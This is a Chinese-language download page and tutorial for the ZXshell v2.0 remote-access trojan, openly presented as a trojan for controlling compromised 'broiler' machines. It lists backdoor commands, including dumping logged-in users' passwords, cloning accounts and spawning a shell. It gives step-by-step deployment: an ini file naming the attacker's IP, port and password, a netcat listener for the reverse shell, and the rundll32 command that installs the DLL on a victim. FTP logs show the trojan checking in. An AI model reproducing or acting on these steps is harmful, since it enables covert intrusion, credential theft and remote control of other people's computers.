版权所有：
软件版本：动画
文件大小：5.69MB
操作系统：win9x/NT/2000/XP
下载说明： ZXshell安装使用教学

　　ZXshell v2.0是一款精致的木马，只有12K大小，拥有小榕BITS的高隐蔽性，支持正向和反向连接方式；具有类似Winshell的操作及更多实用的功能；能像网络神偷一样实现服务端上线通知，查看在线服务端IP。其主要功能如下：

命令列表 注释
? 显示此消息
info 系统版本信息
shell 获得系统命令提示符
download Http下载
list 列出所有进程
kill 结束指定进程
termsvc 设置终端服务
fpass 查看已登录用户的密码
clone 克隆/删除任意用户
whoami 显示本服务的进程PID
remove 禁用本服务
exit 退出但不关闭服务端
quit 退出并关闭服务端
reboot 重新启动计算机
shutdown 关闭计算机

　　ZXshell的使用过程相对简单，只要上面的命令记住就OK了。启动ZXshell，输入密码后，显示成功。注意这是不回显的，我们输入“?”是看不到的。我们输入info，回显如下：

CMD>系统版本：Windows 2000 Advanced Server
语言：Chinese(PRC)
驱动程序版本：12/09/1999,5.00.2195.1

命令成功完成。

　　假如要删除它，只要输入remove 就可以了。其它的功能也很简单，大家自己动手操作一下就知道了。
　　假如你的机器不是FTP服务器或WWW服务器，在使用ZXshell时记得将MyIP改为你的IP，最好是固定的，能被公网解释到，要不然它可能不会太听话的哟。


安装
　　首先配置客户端，如动画演示，要填上可供下载的INI文件地址，我们用WWW或FTP都可以实现的。
　　在其他计算机安装了配置好的服务端后，必须将zxsvc.ini设置好后上传到配制服务端时设定的网址（或FTP），下面介绍如何设置zxsvc.ini，该文件原始内容如下（只能修“=”后面的内容）：

[zxconfig]

MyIP=127.0.0.1 告诉服务端将UDP消息发给这个IP地址，也就是填你自己的IP，我准备只在肉机上操作
Port=2004 告诉服务端打开这个端口等待连接
Password=123456 客户端连接时需要的密码，这个可以设复杂一点
Banner=Password: 密码提示

BackConnect=0 “0”表示不采用反向连接，也就是打开端口等待连接，“1”表示通知服务端反向连接。
ServerID=123 当BackConnect=1时，这里填的数据就是要通知的服务端的ServerID号，该号在接收到的UDP消息中有提供
LocalPort=8080 当BackConnect=1时，必须配合nc.exe使用，在本地打开端口，如nc -l -p 8080，若想再次接收反弹Shell必须使用另一个LocalPort！

　　设置好后先运行zxrecv.exe（接受服务端的信息），然后将zxsvc.ini上传到你的主页空间（这里是FTP空间），位置必须对应在配制服务端时设定的网址，当服务端读取到该文件后先给MyIP发个信息(主机名、IP地址、ServerID号），再判断BackConnect的值，“=0”则打开Port等待连接，“=1”则判断ServerID是否与自己一样，如果是则向MyIP反弹Shell！
　　我们要保证INI文件能被下载到，就是FTP能正常工作。把生成的DLL文件传到另一台肉机（要控制的），并运行它，运行命令为“Rundll32 ZXshell.DLL,I”（注意I为大写），我用的是DNTU，在这儿回车就可以了，这样就安装成功了。接着我们试着连接肉机的2004端口，稍等一下，最后就可以看到熟悉的成功界面了，为Password:123456。现在我们再看一下FTP的记录，是否有读到INI文件：

[2004-9-29 17:18:22] [352] Incoming connection from 218.19.130.210:1407.
[2004-9-29 17:18:22] [188] Incoming connection from 218.19.130.210:1408.
[2004-9-29 17:18:22] [352] Login for user "test" refused due to connection limit.
[2004-9-29 17:18:22] [352] Connection closed.
[2004-9-29 17:18:22] [188] Login for user "test" refused due to connection limit.
[2004-9-29 17:18:22] [188] Connection closed.
[2004-9-29 17:18:38] [220] User "test" began downloading "/ok.ini".
[2004-9-29 17:18:38] [220] Download completed.
[2004-9-29 17:18:38] [224] User "test" began downloading "/ok.ini".
[2004-9-29 17:18:38] [224] Download completed.


　　有的，成功下载，这就表明我们的木马可以正常工作了。

立即下载